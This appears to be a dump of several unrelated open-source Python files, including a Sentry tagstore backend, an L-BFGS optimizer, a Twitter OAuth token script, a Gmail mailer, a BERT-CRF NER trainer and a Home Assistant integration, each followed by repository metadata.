[[tag, '!=', '']]\n aggregations = [\n ['count()', '', 'times_seen'],\n ['min', SEEN_COLUMN, 'first_seen'],\n ['max', SEEN_COLUMN, 'last_seen'],\n ]\n\n result = snuba.query(start, end, [tag], conditions, filters,\n aggregations, limit=limit, orderby='-times_seen',\n referrer='tagstore.get_top_group_tag_values')\n return [\n GroupTagValue(\n group_id=group_id,\n key=key,\n value=value,\n **fix_tag_value_data(data)\n ) for value, data in six.iteritems(result)\n ]\n\n def __get_release(self, project_id, group_id, first=True):\n start, end = self.get_time_range()\n filters = {\n 'project_id': [project_id],\n }\n conditions = [['tags[sentry:release]', 'IS NOT NULL', None]]\n if group_id is not None:\n filters['issue'] = [group_id]\n aggregations = [['min' if first else 'max', SEEN_COLUMN, 'seen']]\n orderby = 'seen' if first else '-seen'\n\n result = snuba.query(start, end, ['tags[sentry:release]'], conditions, filters,\n aggregations, limit=1, orderby=orderby,\n referrer='tagstore.__get_release')\n if not result:\n return None\n else:\n return result.keys()[0]\n\n def get_first_release(self, project_id, group_id):\n return self.__get_release(project_id, group_id, True)\n\n def get_last_release(self, project_id, group_id):\n return self.__get_release(project_id, group_id, False)\n\n def get_release_tags(self, project_ids, environment_id, versions):\n start, end = self.get_time_range()\n filters = {\n 'project_id': project_ids,\n 'environment': [environment_id],\n }\n # NB we add release as a condition rather than a filter because\n # this method is already dealing with version strings rather than\n # release ids which would need to be translated by the snuba util.\n tag = 'sentry:release'\n col = 
'tags[{}]'.format(tag)\n conditions = [[col, 'IN', versions]]\n aggregations = [\n ['count()', '', 'times_seen'],\n ['min', SEEN_COLUMN, 'first_seen'],\n ['max', SEEN_COLUMN, 'last_seen'],\n ]\n\n result = snuba.query(start, end, ['project_id', col],\n conditions, filters, aggregations,\n referrer='tagstore.get_release_tags')\n\n values = []\n for project_data in six.itervalues(result):\n for value, data in six.iteritems(project_data):\n values.append(\n TagValue(\n key=tag,\n value=value,\n **fix_tag_value_data(data)\n )\n )\n\n return set(values)\n\n def get_group_ids_for_users(self, project_ids, event_users, limit=100):\n start, end = self.get_time_range()\n filters = {\n 'project_id': project_ids,\n }\n conditions = [\n ['tags[sentry:user]', 'IN', filter(None, [eu.tag_value for eu in event_users])],\n ]\n aggregations = [['max', SEEN_COLUMN, 'last_seen']]\n\n result = snuba.query(start, end, ['issue'], conditions, filters,\n aggregations, limit=limit, orderby='-last_seen',\n referrer='tagstore.get_group_ids_for_users')\n return set(result.keys())\n\n def get_group_tag_values_for_users(self, event_users, limit=100):\n start, end = self.get_time_range()\n filters = {\n 'project_id': [eu.project_id for eu in event_users]\n }\n conditions = [\n ['tags[sentry:user]', 'IN', filter(None, [eu.tag_value for eu in event_users])]\n ]\n aggregations = [\n ['count()', '', 'times_seen'],\n ['min', SEEN_COLUMN, 'first_seen'],\n ['max', SEEN_COLUMN, 'last_seen'],\n ]\n\n result = snuba.query(start, end, ['issue', 'user_id'], conditions, filters,\n aggregations, orderby='-last_seen', limit=limit,\n referrer='tagstore.get_group_tag_values_for_users')\n\n values = []\n for issue, users in six.iteritems(result):\n for name, data in six.iteritems(users):\n values.append(\n GroupTagValue(\n group_id=issue,\n key='sentry:user',\n value=name,\n **fix_tag_value_data(data)\n )\n )\n return values\n\n def get_groups_user_counts(self, project_id, group_ids, environment_id):\n start, end = self.get_time_range()\n filters = {\n 'project_id': [project_id],\n 'environment': [environment_id],\n 'issue': group_ids,\n }\n aggregations = [['uniq', 'tags[sentry:user]', 'count']]\n\n result = snuba.query(start, end, ['issue'], None, filters, aggregations,\n referrer='tagstore.get_groups_user_counts')\n return defaultdict(int, {k: v for k, v in result.items() if v})\n\n def get_tag_value_paginator(self, project_id, environment_id, key, query=None,\n order_by='-last_seen'):\n from sentry.api.paginator import SequencePaginator\n\n if not order_by == '-last_seen':\n raise ValueError(\"Unsupported order_by: %s\" % order_by)\n\n conditions = []\n if query:\n conditions.append(['tags_value', 'LIKE', '%{}%'.format(query)])\n\n start, end = self.get_time_range()\n results = snuba.query(\n start=start,\n end=end,\n groupby=['tags_value'],\n filter_keys={\n 'project_id': [project_id],\n 'environment': [environment_id],\n 'tags_key': [key],\n },\n aggregations=[\n ['count()', '', 'times_seen'],\n ['min', 'timestamp', 'first_seen'],\n ['max', 'timestamp', 'last_seen'],\n ],\n conditions=conditions,\n orderby=order_by,\n # TODO: This means they can't actually paginate all TagValues.\n limit=1000,\n )\n\n tag_values = [\n TagValue(\n key=key,\n value=value,\n **fix_tag_value_data(data)\n ) for value, data in six.iteritems(results)\n ]\n\n desc = order_by.startswith('-')\n score_field = order_by.lstrip('-')\n return SequencePaginator(\n [(int(to_timestamp(getattr(tv, score_field)) * 1000), tv) for tv in tag_values],\n reverse=desc\n )\n\n 
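# The iterator below mirrors get_tag_value_paginator but scopes the query to a\n    # single issue; '-first_seen' stands in for the legacy '-id' ordering because\n    # Snuba rows have no per-GroupTagValue primary key.\n    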
def get_group_tag_value_iter(self, project_id, group_id, environment_id, key, callbacks=()):\n start, end = self.get_time_range()\n results = snuba.query(\n start=start,\n end=end,\n groupby=['tags_value'],\n filter_keys={\n 'project_id': [project_id],\n 'environment': [environment_id],\n 'tags_key': [key],\n 'issue': [group_id],\n },\n aggregations=[\n ['count()', '', 'times_seen'],\n ['min', 'timestamp', 'first_seen'],\n ['max', 'timestamp', 'last_seen'],\n ],\n orderby='-first_seen', # Closest thing to pre-existing `-id` order\n # TODO: This means they can't actually iterate all GroupTagValues.\n limit=1000,\n )\n\n group_tag_values = [\n GroupTagValue(\n group_id=group_id,\n key=key,\n value=value,\n **fix_tag_value_data(data)\n ) for value, data in six.iteritems(results)\n ]\n\n for cb in callbacks:\n cb(group_tag_values)\n\n return group_tag_values\n\n def get_group_tag_value_paginator(self, project_id, group_id, environment_id, key,\n order_by='-id'):\n from sentry.api.paginator import SequencePaginator\n\n if order_by in ('-last_seen', '-first_seen'):\n pass\n elif order_by == '-id':\n # Snuba has no unique id per GroupTagValue so we'll substitute `-first_seen`\n order_by = '-first_seen'\n else:\n raise ValueError(\"Unsupported order_by: %s\" % order_by)\n\n group_tag_values = self.get_group_tag_value_iter(\n project_id, group_id, environment_id, key\n )\n\n desc = order_by.startswith('-')\n score_field = order_by.lstrip('-')\n return SequencePaginator(\n [(int(to_timestamp(getattr(gtv, score_field)) * 1000), gtv) for gtv in group_tag_values],\n reverse=desc\n )\n\n def get_group_tag_value_qs(self, project_id, group_id, environment_id, key, value=None):\n # This method is not implemented because it is only used by the Django\n # search backend.\n raise NotImplementedError\n\n def get_event_tag_qs(self, project_id, environment_id, key, value):\n # This method is not implemented because it is only used by the Django\n # search backend.\n raise NotImplementedError\n\n def get_group_event_filter(self, project_id, group_id, environment_id, tags):\n start, end = self.get_time_range()\n filters = {\n 'project_id': [project_id],\n 'environment': [environment_id],\n 'issue': [group_id],\n }\n\n conditions = [[['tags[{}]'.format(k), '=', v] for (k, v) in tags.items()]]\n\n result = snuba.raw_query(start, end, selected_columns=['event_id'],\n conditions=conditions, orderby='-timestamp', filter_keys=filters,\n limit=1000, referrer='tagstore.get_group_event_filter')\n\n event_id_set = set(row['event_id'] for row in result['data'])\n\n if not event_id_set:\n return None\n\n return {'event_id__in': event_id_set}\n\n def get_group_ids_for_search_filter(\n self, project_id, environment_id, tags, candidates=None, limit=1000):\n # This method is not implemented since the `group.id` column doesn't\n # exist in Snuba. 
This logic is implemented in the search backend\n        # instead.\n        raise NotImplementedError\n","repo_name":"fictional-tribble-2/getsentry--sentry","sub_path":"src/sentry/tagstore/snuba/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":18944,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"29491511475","text":"import numpy as np\nfrom .base import BaseOptimizer\n\nclass L_BFGS(BaseOptimizer):\n    \"\"\"\n    Implementation of Limited memory BFGS method.\n\n    Parameters\n    ----------\n    M : int\n        size of batch (prefer values 3 - 20)\n    eps : float\n        tolerance value for answer\n    MAX_DESC_ITER : int\n        number of maximum iterations\n    alpha0 : float\n        initial value for line search\n    c1 : float\n        Armijo condition parameter\n    \"\"\"\n    def __init__(self, M=10, eps=1e-7, MAX_DESC_ITER=2000, alpha0=0.5, c1=0.0001):\n        self.M = M\n        self.eps = eps\n        self.MAX_DESC_ITER = MAX_DESC_ITER\n        super().__init__(alpha0=alpha0, c1=c1)\n    \n    def optimize(self, func, x0):\n        \"\"\"\n        Calculation of the minima.\n\n        Parameters\n        ----------\n        func : function -> float\n            function to minimize\n        x0 : ndarray of float\n            initial point\n        \n        Returns\n        -------\n        xk : ndarray of float\n            final iteration point (it is a min point if algorithm converged)\n        \"\"\"\n        xk = x0\n        n = x0.shape[0]\n        self.grad_ = self._grad_func(func)\n        gfk = self.grad_(xk)\n        self.points_ = np.array([x0])\n        \n        k = 0\n        s = np.array([x0])\n        y = np.array([gfk])\n        \n        self.num_steps_ = 0\n        while self.num_steps_ < self.MAX_DESC_ITER:\n            inv_hfk = np.dot(s[k], y[k]) / np.dot(y[k], y[k]) * np.identity(n)\n            \n            pk = -self._BFGS_recursion(s, y, gfk, inv_hfk, k)\n            alpha_opt = self._line_search(func, xk, pk)\n            \n            if alpha_opt is None:\n                pk = -gfk\n                alpha_opt = self._line_search(func, xk, pk)\n            \n            if alpha_opt is None:\n                break\n            \n            xk_new = xk + alpha_opt*pk\n            gfk_new = self.grad_(xk_new)\n            \n            if k >= self.M-1 or k == 0:\n                s = np.delete(s, 0, 0)\n                y = np.delete(y, 0, 0)\n            else:\n                k += 1\n            \n            s = np.append(s, [xk_new - xk], axis=0)\n            y = np.append(y, [gfk_new - gfk], axis=0)\n            \n            if np.linalg.norm(gfk_new) < self.eps and np.linalg.norm(xk_new - xk) < self.eps:\n                break\n            \n            xk = xk_new\n            self.points_ = np.append(self.points_, [xk_new], axis=0)\n            gfk = gfk_new\n            self.num_steps_ += 1\n        return xk\n\n    @staticmethod\n    def _BFGS_recursion(s, y, gfk, inv_hfk, k):\n        \"\"\"\n        L-BFGS two-loop recursion algorithm.\n        Algorithm 7.4 from Nocedal Wright book.\n\n        Parameters\n        ----------\n        s : ndarray (m, dims) shape of float\n            contains differences between points\n        y : ndarray (m, dims) shape of float\n            contains differences between gradients\n        gfk : ndarray of float\n            current gradient\n        inv_hfk : ndarray of float\n            inverse hessian\n        k : int\n            current number of items in batch\n        \"\"\"\n        m = s.shape[0]\n        alpha = np.zeros(m)\n        \n        # copy the gradient: the recursion updates q in place, and the caller\n        # still needs the unmodified gfk after this call\n        q = gfk.copy()\n        for i in range(k):\n            alpha[m-i-1] = np.dot(s[m-i-1], q) / np.dot(s[m-i-1], y[m-i-1])\n            q -= alpha[m-i-1] * y[m-i-1]\n        \n        r = np.dot(inv_hfk, q)\n        for i in range(k):\n            beta = np.dot(y[i], r) / np.dot(s[i], y[i])\n            r += s[i] * (alpha[i] - beta)\n        \n        return r\n\n    def _grad_func(self, func):\n        return super()._grad_func(func)","repo_name":"gittasche/Some-minimization-algorithms","sub_path":"unconstrained/l_bfgs.py","file_name":"l_bfgs.py","file_ext":"py","file_size_in_byte":3609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"43330727404","text":"#!/usr/bin/env python3\n\nfrom base64 import b64encode\n\nimport requests\nimport sys\n\nURL = 
'https://api.twitter.com/oauth2/token'\n\ndef login():\n    secrets = {}\n    with open('secret.credentials') as f:\n        for line in f:\n            ws = line.split()\n            secrets[ws[0]] = ws[1]\n\n    consumer_key = secrets['consumer-key']\n    consumer_sec = secrets['consumer-secret']\n    key = b64encode(bytes('{}:{}'.format(consumer_key, consumer_sec), encoding='utf8'))\n\n    headers = \\\n        { 'Authorization' : 'Basic {}'.format(str(key, encoding='utf8'))\n        , 'Content-Type' : 'application/x-www-form-urlencoded;charset=UTF-8' }\n    data = 'grant_type=client_credentials'\n    r = requests.post(URL, data=data, headers=headers).json()\n    if r['token_type'] != 'bearer':\n        sys.stderr.write('cannot understand login reply: {}\\n'.format(r))\n        return\n    secrets['access-token'] = r['access_token']\n\n    with open('secret.credentials', 'w') as f:\n        for k, v in sorted(secrets.items()):\n            f.write('{} {}\\n'.format(k, v))\n\nif __name__ == '__main__':\n    login()\n","repo_name":"rgrig/twitstat","sub_path":"oauth.py","file_name":"oauth.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"}
+{"seq_id":"74874314600","text":"import os\nimport smtplib\nimport logging\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\nfrom config import Config\n\nclass Mailer:\n    def __init__(self):\n        cfg = Config()\n        self.fromaddr = cfg.mail_user\n        self.toaddrs = cfg.mail_to\n        self.username = cfg.mail_user\n        self.password = cfg.mail_pass\n        self.send_mails = cfg.send_mails\n\n    def send_mail(self,title,body):\n        success = False\n        if not self.send_mails:\n            return\n        \n        msg = MIMEMultipart()\n        msg['From'] = self.fromaddr\n        msg['To'] = self.toaddrs\n        msg['Subject'] = title\n        msg.attach(MIMEText(body, 'plain'))\n        logging.info('Sending mail...')\n\n        try:\n            # sending mail\n            server = smtplib.SMTP('smtp.gmail.com:587')\n            server.starttls()\n            server.ehlo()\n            server.login(self.username,self.password)\n            text = msg.as_string()\n            problems = server.sendmail(self.fromaddr, self.toaddrs, text)\n            server.quit()\n            if problems:\n                logging.error(problems)\n            else:\n                logging.info('Sent.')\n                success = True\n\n        except Exception as e:\n            err_msg = \"Error sending email\"\n            # pass the message and the exception as lazy %-style arguments\n            logging.error('%s: %s', err_msg, e)\n        return success\n","repo_name":"leoivars/internet_monitor","sub_path":"mailer.py","file_name":"mailer.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"}
+{"seq_id":"13306903104","text":"#! 
-*- coding: utf-8 -*-\n# Chinese named entity recognition with a CRF head\n# Dataset: http://s3.bmio.net/kashgari/china-people-daily-ner-corpus.tar.gz\n# Measured F1 reaches 96.48% on the validation set and 95.38% on the test set\n\nimport numpy as np\nimport os\n\nfrom keras import regularizers\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nos.chdir(os.path.dirname(__file__))\nfrom keras.callbacks import ReduceLROnPlateau, EarlyStopping, ModelCheckpoint\n\nfrom path import train_file_path_NER, test_file_path_NER, BASE_MODEL_DIR, BASE_CONFIG_NAME, BASE_CKPT_NAME, event_type, \\\n    weights_path, MODEL_TYPE\nfrom utils.backend import keras, K\nfrom utils.models import build_transformer_model\nfrom utils.tokenizers import Tokenizer\nfrom utils.optimizers import Adam\nfrom utils.snippets import sequence_padding, DataGenerator\nfrom utils.snippets import open, ViterbiDecoder, to_array\nfrom utils.layers import ConditionalRandomField\nfrom keras.layers import Dense, LSTM, Bidirectional, TimeDistributed, Dropout\nfrom keras.models import Model\nfrom tqdm import tqdm\n\nmaxlen = 180\nepochs = 300\nbatch_size = 64\nbert_layers = 6\nlearning_rate = 1e-3  # the smaller bert_layers is, the larger the learning rate should be\ncrf_lr_multiplier = 2000  # enlarge the CRF layer's learning rate when necessary\ncategories = set()\n\n# BERT configuration\nconfig_path = BASE_CONFIG_NAME\ncheckpoint_path = BASE_CKPT_NAME\ndict_path = '{}/vocab.txt'.format(BASE_MODEL_DIR)\n\n\ndef load_data(filename):\n    \"\"\"Load the data.\n    Per-sample format: [text, (start, end, label), (start, end, label), ...],\n    meaning that text[start:end + 1] is an entity of type label.\n    \"\"\"\n    D = []\n    with open(filename, encoding = 'utf-8') as f:\n        f = f.read()\n        for l in f.split('\\n\\n'):\n            if not l:\n                continue\n            d = ['']\n            for i, c in enumerate(l.split('\\n')):\n                char, flag = c.split(' ')\n                d[0] += char\n                if flag[0] == 'B':\n                    d.append([i, i, flag[2:]])\n                    categories.add(flag[2:])\n                elif flag[0] == 'I':\n                    d[-1][1] = i\n            D.append(d)\n    return D\n\n\n# labeled data\ntrain_data = load_data(train_file_path_NER)\ntest_data = load_data(test_file_path_NER)\ncategories = list(sorted(categories))\n\n# build the tokenizer\ntokenizer = Tokenizer(dict_path, do_lower_case = True)\n\n\nclass data_generator(DataGenerator):\n    \"\"\"Data generator\n    \"\"\"\n    \n    def __iter__(self, random = False):\n        batch_token_ids, batch_segment_ids, batch_labels = [], [], []\n        for is_end, d in self.sample(random):\n            tokens = tokenizer.tokenize(d[0], maxlen = maxlen)\n            mapping = tokenizer.rematch(d[0], tokens)\n            start_mapping = {j[0]: i for i, j in enumerate(mapping) if j}\n            end_mapping = {j[-1]: i for i, j in enumerate(mapping) if j}\n            token_ids = tokenizer.tokens_to_ids(tokens)\n            segment_ids = [0] * len(token_ids)\n            labels = np.zeros(len(token_ids))\n            for start, end, label in d[1:]:\n                if start in start_mapping and end in end_mapping:\n                    start = start_mapping[start]\n                    end = end_mapping[end]\n                    labels[start] = categories.index(label) * 2 + 1\n                    labels[start + 1:end + 1] = categories.index(label) * 2 + 2\n            batch_token_ids.append(token_ids)\n            batch_segment_ids.append(segment_ids)\n            batch_labels.append(labels)\n            if len(batch_token_ids) == self.batch_size or is_end:\n                batch_token_ids = sequence_padding(batch_token_ids)\n                batch_segment_ids = sequence_padding(batch_segment_ids)\n                batch_labels = sequence_padding(batch_labels)\n                yield [batch_token_ids, batch_segment_ids], batch_labels\n                batch_token_ids, batch_segment_ids, batch_labels = [], [], []\n\n\n\"\"\"\nThe code below uses a bert-style model; if you use albert instead, change the\nfirst few lines to:\nmodel = build_transformer_model(\n    config_path,\n    checkpoint_path,\n    model='albert',\n)\noutput_layer = 'Transformer-FeedForward-Norm'\noutput = model.get_layer(output_layer).get_output_at(bert_layers - 1)\n\"\"\"\n\n# model = 
build_transformer_model(\n#     config_path,\n#     checkpoint_path,\n#     model = MODEL_TYPE,\n# )\n# output_layer = 'Transformer-FeedForward-Norm'\n# output = model.get_layer(output_layer).get_output_at(bert_layers - 1)\n\nmodel = build_transformer_model(\n    config_path,\n    checkpoint_path,\n    model = MODEL_TYPE\n)\n\noutput_layer = 'Transformer-%s-FeedForward-Norm' % (bert_layers - 1)\noutput = model.get_layer(output_layer).output\n\n\n# output = Bidirectional(LSTM(64,\n#                             return_sequences = True,\n#                             dropout = 0.5,\n#                             recurrent_dropout = 0.5,\n#                             kernel_regularizer = keras.regularizers.l2(0.01)))(output)\noutput = TimeDistributed(Dense(len(categories) * 2 + 1))(output)\noutput = Dropout(0.5)(output)\n# output = Dense(len(categories) * 2 + 1)(output)\nCRF = ConditionalRandomField(lr_multiplier = crf_lr_multiplier)\noutput = CRF(output)\n\nmodel = Model(model.input, output)\nfor layer in model.layers:\n    layer.trainable = True\nmodel.summary()\n\nmodel.compile(\n    loss = CRF.sparse_loss,\n    optimizer = Adam(learning_rate),\n    metrics = [CRF.sparse_accuracy]\n)\n\n\nclass NamedEntityRecognizer(ViterbiDecoder):\n    \"\"\"Named entity recognizer\n    \"\"\"\n    \n    def recognize(self, text):\n        tokens = tokenizer.tokenize(text, maxlen = 512)\n        mapping = tokenizer.rematch(text, tokens)\n        token_ids = tokenizer.tokens_to_ids(tokens)\n        segment_ids = [0] * len(token_ids)\n        token_ids, segment_ids = to_array([token_ids], [segment_ids])\n        nodes = model.predict([token_ids, segment_ids])[0]\n        labels = self.decode(nodes)\n        entities, starting = [], False\n        for i, label in enumerate(labels):\n            if label > 0:\n                if label % 2 == 1:\n                    starting = True\n                    entities.append([[i], categories[(label - 1) // 2]])\n                elif starting:\n                    entities[-1][0].append(i)\n                else:\n                    starting = False\n            else:\n                starting = False\n        return [(mapping[w[0]][0], mapping[w[-1]][-1], l) for w, l in entities]\n\n\nNER = NamedEntityRecognizer(trans = K.eval(CRF.trans), starts = [0], ends = [0])\n\n\ndef evaluate(data, tqdm_verbose = False):\n    \"\"\"Evaluation function\n    \"\"\"\n    X, Y, Z = 1e-10, 1e-10, 1e-10\n    if tqdm_verbose:\n        for d in tqdm(data, ncols = 100):\n            R = set(NER.recognize(d[0]))\n            T = set([tuple(i) for i in d[1:]])\n            X += len(R & T)\n            Y += len(R)\n            Z += len(T)\n    else:\n        for d in data:\n            R = set(NER.recognize(d[0]))\n            T = set([tuple(i) for i in d[1:]])\n            X += len(R & T)\n            Y += len(R)\n            Z += len(T)\n    f1, precision, recall = 2 * X / (Y + Z), X / Y, X / Z\n    return f1, precision, recall\n\n\nclass Evaluator(keras.callbacks.Callback):\n    \"\"\"Evaluate and save\n    \"\"\"\n    \n    def __init__(self):\n        self.best_val_f1 = 0\n    \n    def on_epoch_end(self, epoch, logs = None):\n        trans = K.eval(CRF.trans)\n        NER.trans = trans\n        # print(NER.trans)\n        f1, precision, recall = evaluate(train_data)\n        # save the best model\n        # if f1 >= self.best_val_f1:\n        #     self.best_val_f1 = f1\n        #     save_file_path = \"{}/{}_{}_ner.h5\".format(weights_path, event_type, BASE_MODEL_DIR)\n        #     model.save_weights(save_file_path)\n        print(\n            'train: f1: %.5f, precision: %.5f, recall: %.5f' %\n            (f1, precision, recall)\n        )\n        f1, precision, recall = evaluate(test_data)\n        print(\n            'test: f1: %.5f, precision: %.5f, recall: %.5f' %\n            (f1, precision, recall)\n        )\n\n\nif __name__ == '__main__':\n    save_file_path = \"{}/{}_{}_tiny_ner_crf.h5\".format(weights_path, event_type, MODEL_TYPE)\n    \n    evaluator = Evaluator()\n    train_generator = data_generator(train_data, batch_size)\n    reduce_lr = ReduceLROnPlateau(monitor = 'loss', factor = 0.5, patience = 3, verbose = 1)\n    early_stopping = EarlyStopping(monitor = 'loss', patience = 10, verbose = 1)  # early stopping\n    save_model = 
ModelCheckpoint(save_file_path, monitor = 'loss', verbose = 1, save_best_only = True,\n mode = 'min')\n\n for i, item in enumerate(train_generator):\n print(\"\\nbatch_token_ids shape: shape:\", item[0][0].shape)\n print(\"batch_segment_ids shape:\", item[0][1].shape)\n print(\"batch_labels shape:\", item[1].shape)\n if i == 4:\n break\n\n # batch_token_ids: (batch_size, maxlen) or (batch_size, n), n <= maxlen\n # batch_segment_ids: (batch_size, maxlen) or (batch_size, n), n <= maxlen\n # batch_labels: (batch_size, maxlen) or (batch_size, n), n <= maxlen\n \n model.fit(\n train_generator.forfit(),\n steps_per_epoch = len(train_generator),\n epochs = epochs,\n callbacks = [evaluator, early_stopping, reduce_lr, save_model]\n )\n\nelse:\n save_file_path = \"{}/{}_{}_tiny_ner_crf.h5\".format(weights_path, event_type, MODEL_TYPE)\n model.load_weights(save_file_path)\n NER.trans = K.eval(CRF.trans)\n","repo_name":"Bureaux-Tao/NLP-BERT-keras","sub_path":"NER/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":9378,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"4101190417","text":"import sys\nsys.stdin = open('최소비용 구하기2.txt')\nimport collections\n\ndef bfs():\n global min_cost\n global min_list\n visit = [float('inf') for i in range(n + 1)]\n deq = collections.deque()\n for i in range(len(cityCanGo[startCity])):\n eend, ccost = cityCanGo[startCity][i]\n deq.append((eend, ccost, [startCity, eend]))\n \n while len(deq) != 0:\n nextCity, costSum, temp_foot = deq.popleft()\n \n if costSum < min_cost:\n if nextCity == endCity:\n min_cost = costSum\n min_list = temp_foot\n \n for j in range(len(cityCanGo[nextCity])):\n goCity, bbcost = cityCanGo[nextCity][j]\n if goCity in temp_foot:\n continue\n else:\n if min_cost <= costSum + bbcost:\n continue\n \n if goCity == endCity:\n min_cost = costSum + bbcost\n min_list = temp_foot + [goCity]\n else:\n if visit[goCity] < costSum + bbcost:\n continue\n else:\n visit[goCity] = costSum + bbcost\n deq.append((goCity, costSum + bbcost, temp_foot + [goCity]))\n\nn = int(input())\nm = int(input())\n\ncityCanGo = [[] for i in range(n + 1)]\n\nfor i in range(m):\n start, end, cost = map(int, input().split())\n cityCanGo[start].append((end, cost))\n\nstartCity, endCity = map(int, input().split())\n\nmin_cost = float('inf')\nmin_list = set()\n\nbfs()\nif startCity == endCity:\n min_cost = 0\n min_list = {startCity}\n \nprint(min_cost)\nprint(len(min_list))\nprint(*min_list)","repo_name":"HwnagYoungJun/algorithm","sub_path":"2020/4월/0408/최소비용 구하기2.py","file_name":"최소비용 구하기2.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"8710524242","text":"import logging\n\nfrom homeassistant.core import HomeAssistant\nfrom homeassistant.helpers.debounce import Debouncer\nfrom homeassistant.helpers.entity import DeviceInfo\nfrom homeassistant.helpers.update_coordinator import CoordinatorEntity, DataUpdateCoordinator\n\nfrom .aldes.product import AldesProduct\nfrom .const import DOMAIN, INTEGRATION, SCAN_INTERVAL\n\n_LOGGER = logging.getLogger(__name__)\n\nclass AldesProductDataUpdateCoordinator(DataUpdateCoordinator):\n\n def __init__(self, hass: HomeAssistant, product: AldesProduct) -> None:\n super().__init__(\n hass,\n _LOGGER,\n name = f'{DOMAIN}-{product.id}',\n update_interval = SCAN_INTERVAL,\n request_refresh_debouncer = Debouncer(\n hass, _LOGGER, cooldown = 5, immediate = False\n )\n )\n \n 
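# The Debouncer above coalesces refresh requests that arrive within a 5 s\n        # window, so rapid UI interactions do not hammer the Aldes cloud API;\n        # SCAN_INTERVAL drives the regular polling cadence.\n        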
self.product = product\n\n    async def _async_update_data(self) -> None:\n        await self.product.update()\n\nclass AldesProductEntity(CoordinatorEntity[AldesProductDataUpdateCoordinator]):\n\n    def __init__(self, coordinator: AldesProductDataUpdateCoordinator, entity_suffix: str) -> None:\n        super().__init__(coordinator)\n        \n        product = coordinator.product\n        self._attr_name = f'{product.get_display_name()} {entity_suffix}'\n        self._attr_unique_id = f'{product.id}-{entity_suffix.lower().replace(\" \", \"-\")}'\n        self._attr_device_info = DeviceInfo(\n            identifiers = {(DOMAIN, product.id)},\n            manufacturer = INTEGRATION,\n            model = product.get_display_name(),\n            name = product.name\n        )\n","repo_name":"aalmazanarbs/hassio_aldes","sub_path":"entity.py","file_name":"entity.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"18"}
+{"seq_id":"25124915171","text":"# -*- coding: UTF-8 -*-\nimport os\nimport json\nimport logging\nfrom googleapiclient.discovery import build\nfrom tqdm import tqdm\nfrom data import get_classes_ordered\nlogging.getLogger('googleapiclient.discovery_cache').setLevel(logging.ERROR)\n\nvariables_file = 'variables.json'\nwith open(variables_file) as f:\n    config = json.load(f)\n\n# ============================================================\n# VARIABLES TO MODIFY\n# ============================================================\noutput_path = config['project_folder'] + 'google_prior/'\n# ============================================================\n\n# API keys --------------------------------------------\napi_keys = [\n    # add API keys\n]\n\n# Google Custom Search --------------------------------\ncse_ids = [\n    # add Google Custom Search IDs\n]\n\n# Function to perform a google search\ndef google_search(search_term, api_key, cse_id, **kwargs):\n    service = build(\"customsearch\", \"v1\", developerKey=api_key)\n    res = service.cse().list(q=search_term, cx=cse_id, **kwargs).execute()\n    return res\n\ndef transform_obj(obj):\n    tweakedObj = [obj]\n    if obj == 'bell_pepper':\n        tweakedObj = ['bell pepper', 'green pepper', 'red pepper']\n    elif obj == 'cup':\n        tweakedObj = ['cup', 'mug']\n    elif obj == 'pot':\n        tweakedObj = ['pot', 'saucepan', 'pan']\n    elif obj == 'pan':\n        tweakedObj = ['pan', 'frying pan']\n    elif obj == 'eating_utensil':\n        tweakedObj = ['eating utensil', 'knife', 'spoon', 'fork']\n    elif obj == 'cooking_utensil':\n        tweakedObj = ['cooking utensil', 'knife', 'scissors', 'peeler',\n                      'scale', 'jug', 'colander', 'strainer', 'blender']\n    elif obj == 'fridge_drawer':\n        tweakedObj = ['fridge drawer', 'refrigerator drawer']\n    elif obj == 'cutting_board':\n        tweakedObj = ['cutting board', 'cut board', 'chopping board',\n                      'chop board']\n    elif obj == 'cheese_container':\n        tweakedObj = ['cheese container', 'cheese recipient', 'cheese package']\n    elif obj == 'oil_container':\n        tweakedObj = ['oil container', 'oil recipient', 'oil bottle']\n    elif obj == 'bread_container':\n        tweakedObj = ['bread container', 'bread recipient', 'bread package',\n                      'bread bag']\n    elif obj == 'grocery_bag':\n        tweakedObj = ['grocery bag', 'groceries']\n    elif obj == 'seasoning_container':\n        tweakedObj = ['seasoning container', 'seasoning recipient',\n                      'seasoning bottle', 'seasoning package']\n    elif obj == 'condiment_container':\n        tweakedObj = ['condiment container', 'condiment recipient',\n                      'condiment bottle']\n    elif obj == 'tomato_container':\n        tweakedObj = ['tomato container', 'tomato recipient', 'tomato bottle']\n    elif obj == 'fridge':\n        
tweakedObj = ['fridge', 'refrigerator']\n\n elif obj == 'paper_towel':\n tweakedObj = ['paper towel', 'tissue', 'kitchen paper',\n 'kitchen towel']\n elif obj == 'cabinet':\n tweakedObj = ['cabinet', 'locker', 'cupboard']\n return tweakedObj\n\ndef transform_verb(verb):\n tweakedVerb = [verb]\n if verb == 'divide/pull apart':\n tweakedVerb = ['divide', 'pull apart', 'separate', 'split', 'shred']\n elif verb == 'move_around':\n tweakedVerb = ['move around', 'move', 'transfer']\n elif verb == 'take':\n tweakedVerb = ['take', 'pick', 'pick up', 'grab']\n elif verb == 'put':\n tweakedVerb = ['put', 'leave', 'place']\n elif verb == 'cut':\n tweakedVerb = ['cut', 'slice', 'mince']\n elif verb == 'wash':\n tweakedVerb = ['wash', 'clean']\n elif verb == 'mix':\n tweakedVerb = ['mix', 'mingle', 'blend']\n return tweakedVerb\n\nif __name__ == '__main__':\n if not os.path.exists(output_path):\n os.makedirs(output_path)\n\n objects,_ = get_classes_ordered(config['objects_file'])\n verbs,_ = get_classes_ordered(config['verbs_file'])\n total = 0\n 